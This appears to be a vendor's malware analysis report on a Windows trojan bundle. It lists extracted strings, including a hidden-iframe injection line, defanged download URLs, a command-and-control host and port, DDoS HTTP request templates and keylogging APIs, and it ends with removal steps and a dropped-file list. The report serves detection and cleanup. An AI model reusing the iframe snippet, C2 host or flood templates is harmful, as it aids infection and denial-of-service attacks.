JOIN
127.0.0.1 ZieF.pl
#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
KERNEL32.DLL

CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe_1324_rwx_10001000_00039000:




L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc

i.exe_1172:




.text
`.rdata
@.data
.rsrc
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
ole32.dll
InternetCrackUrlA
WININET.dll
SHLWAPI.dll
.PAVCInternetException@@
360Url
IEUrl
Other%d
hXXp://VVV.wj95.com/
hXXp://uu.cn170.com/BindPlugIn.ini
%x.ini
\config.dat
Windows
1, 0, 0, 2
PostInstall.EXE

DL.exe_1984:




.text
`.data
.rsrc
MSVBVM60.DLL
#vb6chs.dll
1111111
ieframe.dll
SHDocVwCtl.WebBrowser
WebBrowser
E:\VB
\VB6.OLB
C:\Windows\SysWOW64\ieframe.oca
VBA6.DLL
.dwd8
L(.kc
hXXp://uu.cn170.com/y.txt
hXXp://zw.cn170.com/tj.html
1.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
%Documents and Settings%\All Users\
Scripting.FileSystemObject
WScript.Shell
1111111.exe

DL.exe_1984_rwx_00408000_00005000:




.dwd8
L(.kc

ignite.exe_432:




.text
`.data
.rsrc
MSVBVM60.DLL
6.vmmvv
pVVV.6
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
#vb6chs.dll
shdocvw.dll
WebBrowser
%System%\mshtml.tlb
%Program Files%\VB
\VB6.OLB
0%System%\shdocvw.oca
winmm.dll
time.dll
advapi32.dll
RegCloseKey
GetUrlSource
RegCreateKeyA
RegOpenKeyA
wininet.dll
InternetOpenUrlA
VBA6.DLL
%System%\msvbvm60.dll\3
Password
WebBrowser2
WebBrowser1
)o4.tr
sUrl
sSrvCmd
sSrvPassword
\journey.exe
\kindness.exe
\kingdom.exe
\knack.exe
\knead.exe
\knee.exe
\time.dll
\weathers.exe
hXXp://mini.yoyolm.net/ta2/?flag=
hXXp://mini.yoyolm.net/ta3/?flag=
hXXp://time.yoyolm.net/newh1/
hXXp://time.yoyolm.net/newh2/
hXXp://time.yoyolm.net/newh3/
hXXp://mini.yoyolm.net/new/
\setings.ini
hXXp://mini.yoyolm.net/ta1/?flag=
(C) hXXp://VVV.tqshopping.com/
manual.exe

ignite.exe_432_rwx_012F1000_00018000:




%SQVW
<.tBwIJ;
<.tC<9w:<0r6,0f
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
hXXp://VVV.baidu.com/
msvcrt.dll
NTSHRUI.DLL
COMCTL32.DLL
shell32.dll
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell_ERR
setting.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
RegOpenKeyExA
CreateDialogIndirectParamA
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
`.data
.link
.rloc
NTSHRUI.DL
.lnk[she
.baidu.
KeyG
.dN"u
.linke

mankind.exe_528:




.text
`.data
.rsrc
GDIPLUS.DLL
gdi32.dll
kernel32.dll
NTDLL.DLL
user32.dll
MSVBVM60.DLL
6.vmmvv
pVVV.6
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
.aicAlphaImage
.ucListBox
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:81BD8030114B11E38938CDD8DE466017" xmpMM:DocumentID="xmp.did:81BD8031114B11E38938CDD8DE466017"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:81BD802E114B11E38938CDD8DE466017" stRef:documentID="xmp.did:81BD802F114B11E38938CDD8DE466017"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
2014-03-08
.ucShadow
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:FB46B4F2111511E3B7049AB4CCF4786E" xmpMM:DocumentID="xmp.did:FB46B4F3111511E3B7049AB4CCF4786E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FB46B4F0111511E3B7049AB4CCF4786E" stRef:documentID="xmp.did:FB46B4F1111511E3B7049AB4CCF4786E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:22572050111611E3881AFF86113FD3B2" xmpMM:DocumentID="xmp.did:22572051111611E3881AFF86113FD3B2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2257204E111611E3881AFF86113FD3B2" stRef:documentID="xmp.did:2257204F111611E3881AFF86113FD3B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
2014/01/15
#vb6chs.dll
.OsenXPComboBox
.CommandButton
.LbDate
.OsenXPDTPicker
.OsenXPSpin
shdocvw.dll
WebBrowser
%Program Files%\VB
\VB6.OLB
#Web1
0%System%\shdocvw.oca
%System%\mshtml.tlb
URLEncode1
time.dll
wininet.dll
InternetOpenUrlA
comctl32.dll
winmm.dll
%System%\msvbvm60.dll\3
WriteIniKey
GetIniKey
DelIniKey
advapi32.dll
RegCloseKey
RegOpenKeyA
Replace.dll
Password
GetAsyncKeyState
SetWindowsHookExA
UnhookWindowsHookEx
VBA6.DLL
msvbvm60.dll
olepro32.dll
msimg32.dll
shell32.dll
F%System%\stdole2.tlb
GdiplusShutdown
gdiplus.dll
zlib.dll
zlib1.dll
__vbaStopExe
KeyDown
KeyPress
KeyUp
cmdBrowse
cmdClipBoard
comdlg32.dll
AddMsg
DelMsg
\ctl\WinSubHook.tlb
IsSysShadowEnabled
GetProcessHeap
SetMsgHook
SetMsgUnHook
ole32.dll
==?==?==?==?==?
==?==?==?
2003/07/13
strURL
strKey
KeyWord
uMsg
sSrvCmd
sSrvPassword
KeyCode
KeyAscii
Occurs when data is dropped onto the control via an OLE drag/drop operation, and OLEDropMode is set to manual
Occurs when the mouse is moved over the control during an OLE drag/drop operation, if its OLEDropMode property is set to manual
Return whether the OS supports layered windows.
Return whether the OS settings suggest that shadows should be employed. Only truly valid on Windows XP, Windows 2000 will always return True. It is up to the programmer as whether this setting is honored.
Return whether we're running under Windows XP.
Returns a handle (from Microsoft Windows) to an object's window.
Returns the number of items in the list portion of a control.
Occurs when the user presses and releases an ANSI key.
Qh$%C
Rh0%C
PhT%C
Qhd%C
Qh0%C
FTPj
\tclock.ini
tray_yes.png
tray_no.png
\time.dll
Software\Microsoft\Windows\CurrentVersion\run
.exe" /t
hXXp://VVV.weather.com.cn/weather/
.shtml
cmd.exe /c taskkill /im
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
huangli.xml
\journey.exe
\kindness.exe
\kingdom.exe
\knack.exe
\knead.exe
\knee.exe
1.png
setting.ini
ddd.png
\Replace.dll
\Replace64.dll
\uTray.exe
city.txt
toolbar_hover (3).png
2.png
3.png
button_p_pushed.png
button_p_hover.png
00:00:00
hXXp://VVV.baidu.com/s?wd=天气预报&rsv_bp=0&ch=&tn=baidu&bar=&rsv_spt=3&ie=utf-8&rsv_sug3=5&rsv_sug4=565&rsv_sug1=5&oq=天气&rsv_sug2=0&f=3&rsp=0&inputT=9
hXXp://VVV.baidu.com/s?wd=
\Weather_none.png
18:00:00
08:00:00
Refresh_pushed.png
Refresh_normal.png
Refresh_hover.png
<Keys>
</Keys>
<Key ID="
{1D5BE4B5-FA4A-452D-9CDD-5DB35105E7EB}
.cb_Callback
*gif;*.bmp;*.jpg;*.jpeg;*.ico;*.cur;*.wmf;*.emf;*.png
*.bmp
*.gif
*.ico;*.cur
*.jpg;*.jpeg
*.wmf;*.emf
*.png
Windows Meta File
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=
\uCalendar\db2.mdb;Persist Security Info=False
Msxml2.XMLHTTP.3.0
application/x-www-form-urlencoded
\uTray.exe"
0000000
DragFullWindows
0123456789
\uCalendar\input.png
\uCalendar\button_3a.png
\uCalendar\button_3b.png
\uCalendar\tip.png
\uCalendar\NewIcons007.png
\uCalendar\button_state5.png
\uCalendar\setting.ini
(C) hXXp://VVV.tqshopping.com/
weathers.exe

mankind.exe_528_rwx_01C61000_00018000:




%SQVW
<.tBwIJ;
<.tC<9w:<0r6,0f
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
hXXp://VVV.baidu.com/
msvcrt.dll
NTSHRUI.DLL
COMCTL32.DLL
shell32.dll
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell_ERR
setting.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
RegOpenKeyExA
CreateDialogIndirectParamA
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
`.data
.link
.rloc
NTSHRUI.DL
.lnk[she
.baidu.
KeyG
.dN"u
.linke

svhost.exe_628:




.Buffer
`.Ddos
`.text
.Breakth
`.Socket
`.SocketB
`.Attack
`.rdata
@.data
.rsrc
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
MSVCRT.dll
_acmdln
WS2_32.dll
WINMM.dll
iphlpapi.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
t Explorer\iexplore.exe
#0%s!
%s/%s
GET %s?=%d HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0;  hXXp://VVV.baidu.com/search/spider.html)
Host: %s
GET / HTTP/1.1
Host: %s:%d
GET %s HTTP/1.1
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Host: %sContent-Type: text/html
User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01;Baiduspider/2.0;  hXXp://VVV.baidu.com/search/spider.html)
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
Referer: hXXp://%s
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0;  hXXp://VVV.baidu.com/search/spider.html)
%d.%d.%d.%d
192.168.1.244
chinaljndk.3322.org:9999
994175033994175033
InternetOpenUrlA
hra%u.dll
%d.exe
SOFTWARE.LOG
kernel32.dll
ddd
dwNumEntries = %u
.rdata
@.reloc
SHELL32.dll
SHLWAPI.dll
lpk.addon
lpk.dll
7"7'737?7
v.qju
.gc[_

svhost.exe_628_rwx_00413000_00005000:




v.qju
.gc[_






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Scan a system with an anti-rootkit tool.
    2. 

  2. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    i.exe:1172
    tqrl_90_4090.exe:1308
    ws.exe:892
    ignite.exe:428
    ignite.exe:424
    xtsszs_qn2.exe:540
    SS540.exe:1688
    %original file name%.exe:1660
    xtsszs.exe:1484
    

    3. 

  3. Delete the original Trojan file.
    4. 

  4. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7b0.ini (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7b0\DL.exe (3944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\BindPlugIn[1].ini (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\DL[1].exe (6242 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\034Óê ÖÐÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÖÐÇï½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\toolbar_hover (3).png (531 bytes)
    %Documents and Settings%\%current user%\Application Data\mmt.ico (881 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ùͯ½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\032Óê-СÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\huangli.xml (12024 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\´º½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\026Ñ©-´óÑ©.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\039Óê ±©Óêת´ó±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\½Ìʦ½Ú.png (545 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÆßϦ½Ú.png (930 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-Ò¹¼ä¶àÔÆ.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\023Ñ©-СѩתÖÐÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\052³¾ ɳ³¾±©.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-Ò¹¼äÕóÓê .png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\input.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ïû·ÑÕß.png (706 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÀͶ¯½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\setting.ini (208 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\md5dll.dll (8 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\027Ñ©-´óѩת±©Ñ©.png (2392 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹úÇì½Ú.png (508 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_hover.png (680 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\³ýϦ.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\manual.exe (3616 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-Ò¹¼äÇç.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tip.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\024Ñ©-ÖÐÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\053³¾ ³¬É³³¾±©.png (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\047ÒõÌì.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾-ÐÂ.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\022Ñ©-Сѩ.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-Ò¹¼äÕóÑ© .png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_yes.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\723¼ÍÄî.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\yi.png (998 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\046Óê Óê¼ÐÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ËÎç½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Templates\16201410\YYM_955WD30.gif (930 bytes)
    %Documents and Settings%\%current user%\Desktop\ÌìÆôÈÕÀú.lnk (909 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ê¥µ®½Ú.png (873 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\Replace64.dll (3616 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸ß¿¼.png (555 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\Replace.dll (3312 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\028Ñ©-±©Ñ©.png (2392 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÌìÆôÈÕÀú.lnk (921 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\set.ini (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrB5.tmp (138023 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\043Óê ¶³Óê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe (11048 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\time.dll (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_state5.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Base64.dll (4 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\044Óê À×ÕóÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\035Óê ÖÐÓêת´óÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\tjapis[1].htm (89 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\NewIcons007.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3b.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\041Óê ´ó±©Óêת³¬´ó±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÞÈ˽Ú.png (991 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÛÀ¼½Ú.png (913 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\Weather_none.png (11 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-°×ÌìÕóÑ©.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\036Óê ´óÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Math.dll (2392 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇåÃ÷½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\city.txt (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¾Å®½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¸Ç×½Ú.png (846 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3a.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\kindness.exe (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\tclock.ini (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\025Ñ©-ÖÐѩת´óÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ĸÇ×½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\045Óê À×ÕóÓê¼ÓÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹â¹÷½Ú.png (536 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_normal.png (713 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ji.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÈÕÀú1.png (7192 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uTray.exe (5064 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.mdb (12536 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÐÂÔö±¸Íü.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\tj.html (89 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-°×Ìì¶àÔÆ.png (1552 bytes)
    %Documents and Settings%\%current user%\Desktop\.lnk (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\054Îí.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_no.png (450 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\033Óê СÓêתÖÐÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇéÈ˽Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\051³¾ Ñïɳ.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ddd.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-°×ÌìÕóÓê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\037Óê ´óÓêת±©Óê.png (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\042Óê ³¬´ó±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-°×ÌìÇç.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_pushed.png (663 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\weathers.exe (38103 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÔªÏü½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸Ð¶÷½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (20 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\038Óê ±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ƽ°²Ò¹.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.ldb (64 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\040Óê ´ó±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÅäÖÃ\Uninstall.lnk (922 bytes)
    %System%\dm.dll (3902 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\SkinH_EL.dll (88 bytes)
    %System%\regsvr32.exe (300 bytes)
    %System%\svhost.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\SS540.exe (5873 bytes)
    %Program Files%\sszs\uninst.exe (3082 bytes)
    %Program Files%\sszs\xtsszsup.exe (8421 bytes)
    %Program Files%\sszs\xtsszs.exe (7861 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\系统瘦身助手.lnk (650 bytes)
    %Program Files%\sszs\xtsszs.dll (1568 bytes)
    %Program Files%\sszs\mscomctl.ocx (21984 bytes)
    %Documents and Settings%\%current user%\Desktop\系统瘦身助手.lnk (638 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\卸载系统瘦身助手.lnk (479 bytes)
    %System%\diactss.dll (40 bytes)
    %System%\netsh.exe (692 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\i.exe (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe (17629 bytes)
    C:\lpk.dll (601 bytes)
    C:\RCXBA.tmp (16516 bytes)
    %System%\hra33.dll (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\onlinefirst[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\xtsszs_qn2.exe (3915 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ws.exe (897 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cookies\index.dat (788 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cookies\[email protected][1].txt (139 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\ws[1].exe (13382 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\tqrl_90_4090[1].exe (601850 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\17048312[1].js (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\xtsszs_qn2[1].exe (138776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\icon_7[1].gif (922 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\y[1].txt (189 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cookies\[email protected][2].txt (293 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\tj[1].htm (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tqrl_90_4090.exe (20507 bytes)
    

    5. 

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    
    127.0.0.1       localhost
    6. 

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    7. 

